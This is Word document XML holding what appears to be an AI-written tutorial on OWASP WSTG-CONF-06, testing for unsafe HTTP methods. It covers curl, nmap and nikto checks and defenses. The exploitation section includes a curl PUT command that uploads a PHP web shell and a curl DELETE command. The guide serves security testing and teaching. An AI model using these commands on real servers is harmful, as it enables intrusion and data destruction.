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A22C" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">Perfect move </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve"> — now you’re looking at </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WSTG-CONF-06: Test HTTP Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:br/>
        <w:t>This directly connects to your previous topic (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumerate Admin Interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">), because misconfigured HTTP methods can let an attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bypass logins or modify data</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2924272F" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:pict w14:anchorId="08C0366F">
          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B000E90" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Test HTTP Methods in Web Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B9801" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15435B92" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">Check whether the web server or application allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unsafe HTTP methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve"> like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541CB798" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t>PUT → upload/overwrite files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBC2DF7" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t>DELETE → remove files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3C3E37" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t>TRACE → Cross-Site Tracing (XST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442B8398" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t>OPTIONS → leaks available methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54644039" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t>CONNECT → proxy tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2500BB07" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:pict w14:anchorId="50F507E1">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2813B9BC" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Discover Allowed Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C931FF" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a) Using cURL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8FCF2B" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t>curl -i -X OPTIONS http://target.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B5BB1" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C9828C" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t>Allow: GET, POST, OPTIONS, PUT, DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A20842" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:pict w14:anchorId="633C2E7C">
          <v:rect id="_x0000_i1081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2385D2" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>b) Using Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D1ABD1" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t>nmap --script http-methods -p80,443 target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB96BA8" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t>This shows which methods are enabled and whether they are risky.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D63FA40" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:pict w14:anchorId="16D02C88">
          <v:rect id="_x0000_i1082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F844A81" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c) Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B2E39" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t>nikto -h http://target.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2099281C" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t>Nikto flags unusual/unsafe HTTP methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA48720" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:pict w14:anchorId="4B491CF2">
          <v:rect id="_x0000_i1083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E09F01" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Exploitation Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C40D509" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PUT Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3994DC" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:lastRenderedPageBreak/>
        <w:t>If enabled, attacker can upload malicious files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4210868D" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t>curl -X PUT -d '&lt;?php system($_GET["cmd"]); ?&gt;' http://target.com/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F06A5C5" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DELETE Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D12222E" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t>Delete sensitive resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB5E740" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t>curl -X DELETE http://target.com/test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C753FFD" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> TRACE Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1924C087" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">Echoes back request → reveals headers (cookies can be stolen via </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XST</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FAB8EF" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CONNECT Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A958402" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">Turn the webserver into a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve"> → attacker hides traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F6431A" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:pict w14:anchorId="4EE84AF4">
          <v:rect id="_x0000_i1084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06791863" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. In Admin Interfaces Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA93C91" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">Why this matters when scanning </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin panels</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D858620" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">If /admin/ endpoint allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">, attacker can </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>upload a backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367778C7" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">If /login accepts </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TRACE</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">, attacker can use XST to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>steal session cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20614D93" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">Misconfigured methods can </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bypass authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve"> altogether.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE9CDBA" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:pict w14:anchorId="409040B7">
          <v:rect id="_x0000_i1085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="578643CB" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Defense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E399D0" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t>Restrict methods → only allow GET, POST, HEAD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A909CF3" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t>Block PUT, DELETE, TRACE, CONNECT unless explicitly required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E1EEB1" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t>Use WAF rules to filter unusual HTTP verbs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8EE306" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t>Monitor logs for requests with strange verbs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA85E81" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:pict w14:anchorId="790F90A8">
          <v:rect id="_x0000_i1086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="283E687C" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3B2CFE" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cURL/Nmap/Nikto</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve"> to enumerate methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A0535" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t>Watch for dangerous verbs (PUT, DELETE, TRACE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6A2AF" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve">Unsafe methods in </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin panels</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve"> = direct path to compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FC0B03" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:pict w14:anchorId="652D779D">
          <v:rect id="_x0000_i1087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="383F3A19" w14:textId="77777777" w:rsidR="00E71206" w:rsidRPr="00E71206" w:rsidRDefault="00E71206" w:rsidP="00E71206">
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve"> Do you want me to create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>challenge lab</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t xml:space="preserve"> (like exploiting a vulnerable Apache server with PUT to upload a shell), or should I keep it purely </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>theoretical + tools usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71206">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B241403" w14:textId="77777777" w:rsidR="0000111E" w:rsidRPr="00E71206" w:rsidRDefault="0000111E" w:rsidP="00E71206"/>
    <w:sectPr w:rsidR="0000111E" w:rsidRPr="00E7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A0520"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9006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A5D8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1A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A1F03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C06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957C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="385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578343">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="405147127">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2053537103">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="101806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E6"/>
    <w:rsid w:val="0000111E"/>
    <w:rsid w:val="002033E6"/>
    <w:rsid w:val="00363E57"/>
    <w:rsid w:val="005E4A76"/>
    <w:rsid w:val="0072345A"/>
    <w:rsid w:val="00984DF0"/>
    <w:rsid w:val="00CB68ED"/>
